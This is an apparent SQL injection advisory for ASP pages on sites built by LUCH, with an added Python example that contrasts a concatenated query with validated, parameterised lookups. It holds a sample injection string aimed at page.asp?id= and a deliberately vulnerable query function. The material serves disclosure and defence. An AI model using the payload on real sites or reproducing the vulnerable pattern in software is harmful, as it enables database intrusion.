Vendor: Web Designed by LUCH
By: p0pc0rn
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Web Designed by LUCH
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
Web Designed by LUCH Vulnerable to SQL Injection
This vulnerability allows an attacker to inject malicious SQL code into the vulnerable web application, which is designed by LUCH and hosted on http://www.luch.co.il. The vulnerability was discovered by p0pc0rn and affects the page.asp, cat.asp, and catin.asp pages. The injected SQL is appended to the URL: for example, the code 'union select 1 from test.a' appended to the URL http://site.com/page.asp?id=23.
Mitigation:
To mitigate this vulnerability, the web application should be tested for SQL injection vulnerabilities and any vulnerable parameters should be sanitized.
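The following is an added example, not code from the advisory or from the affected application. It shows the mitigation for an `id`-style parameter: strict integer validation plus a bound query parameter, next to the string-concatenation pattern that makes this class of bug possible. The `pages` table, its contents and all function names are assumptions; SQLite stands in for whatever database the site uses.

```python
import sqlite3

# The id value from the advisory's example URL (page.asp?id=23 plus the appended code).
PAGE_PAYLOAD = "23 union select 1 from test.a"

def make_db():
    # Constructed sample data standing in for the site's content table (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER, title TEXT)")
    db.execute("INSERT INTO pages VALUES (23, 'About us')")
    return db

def get_page_unsafe(db, raw_id):
    # Flawed pattern: request text is concatenated into the statement,
    # so everything after the number is parsed as SQL.
    return db.execute("SELECT title FROM pages WHERE id = " + raw_id).fetchall()

def parse_id(raw_id):
    # Allow-list validation: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def get_page_safe(db, raw_id):
    # Bound parameter: the value is sent as data and never becomes SQL text.
    sql = "SELECT title FROM pages WHERE id = ?"
    return db.execute(sql, (parse_id(raw_id),)).fetchall()

def input_reaches_sql_parser(db, raw_id):
    # True when the concatenated query fails because the database tried to
    # parse the request value as SQL (here: the unknown table test.a).
    try:
        get_page_unsafe(db, raw_id)
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("safe lookup for id=23:", get_page_safe(db, "23"))
    print("payload parsed as SQL by unsafe query:",
          input_reaches_sql_parser(db, PAGE_PAYLOAD))
    try:
        get_page_safe(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("safe handler rejected payload:", exc)
```

The same two controls apply to each of the affected pages: reject any `id` that is not a plain integer, and pass the value to the database as a bound parameter rather than as part of the query string.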